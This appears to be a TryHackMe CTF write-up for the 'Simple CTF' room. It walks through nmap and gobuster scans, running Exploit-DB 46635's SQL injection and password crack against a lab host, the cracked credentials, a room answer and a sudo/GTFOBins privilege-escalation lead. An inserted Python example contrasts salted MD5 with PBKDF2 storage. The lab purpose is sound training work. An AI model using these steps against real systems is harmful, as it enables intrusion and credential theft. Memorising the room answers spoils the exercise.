【THM】Simple CTF-Practice

TryHackMe room for this write-up: https://tryhackme.com/room/easyctf

Difficulty: Easy

Port scan

nmap -p- -sC -sV -T4 10.10.246.59


From our results, we can see ports 21 (FTP), 80 (HTTP), and 2222 (SSH) are open.

First, let's just browse to the IP and see what we get.


We find it is the default Apache2 page, not much more to go off of here.

gobuster dir --url http://10.10.246.59/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Using the medium wordlist we supplied, gobuster was able to find a web page at "/simple". Let's browse to it now and see what we find.


Here we can see this is a default page for something called "CMS Made Simple", and if we look in the bottom corner we can see it is version 2.2.8.

Let's see if there is anything online about this particular version by simply going to Google and searching "CMS Made Simple 2.2.8 exploit".

https://www.exploit-db.com/exploits/46635


The exploit is a Python script, so I copied and pasted it into a .py file on my attack box.

Alternatively:


When I ran it, I found the -u argument was missing.


This script performs SQLi against the CMS site, with the goal of returning its user credentials.

python 46635.py -u http://10.10.246.59/simple

python 46635.py -u http://10.10.246.59/simple --crack -w /usr/share/wordlists/rockyou.txt

I don't know why my cracking result differs from the walkthrough's.

[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: admin@admin.com
[+] Password found: 0c01f4468bd75d7a84c7eb73846e8d96
[+] Password cracked: secret

Bingo! We got a username and a cracked password returned from the exploit.
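To make concrete why the --crack step above finishes so quickly, here is an added example (not part of the original write-up or of the exploit script) that places the legacy salted-MD5 check the exploit models next to a PBKDF2-based verifier a CMS should use instead. The hex(md5(salt + password)) form is my reading of the exploit's source and is stated as an assumption; the salt, hash and wordlist values in the block are constructed, not the room's.

```python
import hashlib
import hmac
import os
from typing import Iterable, Optional

# Legacy scheme as the exploit's --crack option models it (assumption from
# my reading of the exploit source): hex(md5(salt + password)).
def legacy_hash(salt: str, password: str) -> str:
    return hashlib.md5((salt + password).encode()).hexdigest()

def legacy_dictionary_check(salt: str, stored: str, candidates: Iterable[str]) -> Optional[str]:
    """Return the candidate whose legacy hash equals `stored`, else None.
    Each guess costs one MD5 call, so a leaked salt + hash falls to a wordlist
    in seconds; the salt only defeats precomputed (rainbow) tables."""
    for cand in candidates:
        if hmac.compare_digest(legacy_hash(salt, cand), stored):
            return cand
    return None

# Hardened storage: PBKDF2-HMAC-SHA256 with a random 16-byte salt and a high
# iteration count, so every guess is deliberately expensive for an attacker too.
PBKDF2_ITERATIONS = 200_000

def hardened_hash(password: str, salt: Optional[bytes] = None,
                  iterations: int = PBKDF2_ITERATIONS) -> str:
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    # Self-describing record so the verifier can recover its own parameters.
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"

def hardened_verify(password: str, stored: str) -> bool:
    try:
        algo, iters, salt_hex, dk_hex = stored.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)

if __name__ == "__main__":
    # Constructed sample values, not the room's real salt or hash.
    salt = "0123456789abcdef"
    stored = legacy_hash(salt, "secret")
    wordlist = ["123456", "password", "qwerty", "secret"]
    print("legacy scheme recovered:", legacy_dictionary_check(salt, stored, wordlist))
    rec = hardened_hash("secret")
    print("pbkdf2 verify (correct, wrong):", hardened_verify("secret", rec), hardened_verify("Secret", rec))
```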

SSH


Is there any other user in the home directory? What's its name?

answer: sunbath


Privilege escalation

On to privilege escalation! First I like to start off by running "sudo -l" to see what my current user can run.

sudo -l


https://gtfobins.github.io/gtfobins/vim/
